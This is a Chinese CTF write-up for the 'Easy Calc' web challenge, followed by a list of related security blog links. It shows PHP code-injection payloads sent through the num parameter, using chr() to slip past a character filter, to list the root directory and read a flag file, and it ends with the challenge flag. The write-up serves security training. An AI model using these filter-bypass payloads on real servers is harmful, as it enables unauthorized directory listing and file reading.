BUUCTF---[RoarCTF 2019]Easy Calc1

1.题目描述

2.搜索网址是一个计算器,输入正常的运算,可以运算

3.查看源码,发现有一个calc.php

4.访问calc.php,代码提示用get方式传输num参数,但是过滤了\等等。

5.构造play load,发现了一个f1agg.

复制代码
num=print_r(scandir(chr(47)))

chr(47)是"/"的ASCII编码

scandir()是用来扫描文件目录

print_r是将扫描结果打印出来

6.尝试访问f1agg

复制代码
num=print_r(file_get_contents(chr(47).f1agg))

file_get_conctents()用来读取f1agg里面的内容,最后print_r将内容输出

7.

复制代码
flag{de45bb5f-1b75-4b33-99fb-904f876df79f} 
相关推荐
不像程序员的程序媛1 小时前
网络安全概念之网闸&防火墙AI版
安全·web安全
Le_ee3 小时前
Apache2
服务器·网络安全·apache·web
小张的博客之旅6 小时前
2025年“羊城杯”网络安全大赛 线上初赛 (WriteUp)
python·学习·网络安全
unable code6 小时前
攻防世界-Web-shrine
网络安全·web·ctf
Never_z&y11 小时前
纵深防御——文件上传漏洞
web安全
缘友一世12 小时前
活动目录的枚举学习
学习·网络安全·网路攻击
K_i13413 小时前
HTTP与HTTPS:从明文到加密的Web安全革命
web安全·http·https
huluang15 小时前
网络安全等级测评师能力评估样卷及答案
安全·web安全
Tajang16 小时前
推荐一个浏览器代理插件(Tajang Proxy),支持Chrome和Edge
前端·chrome·网络安全·渗透测试·靶场·edge
独行soc16 小时前
2025年渗透测试面试题总结-105(题目+回答)
网络·python·安全·web安全·adb·渗透测试·安全狮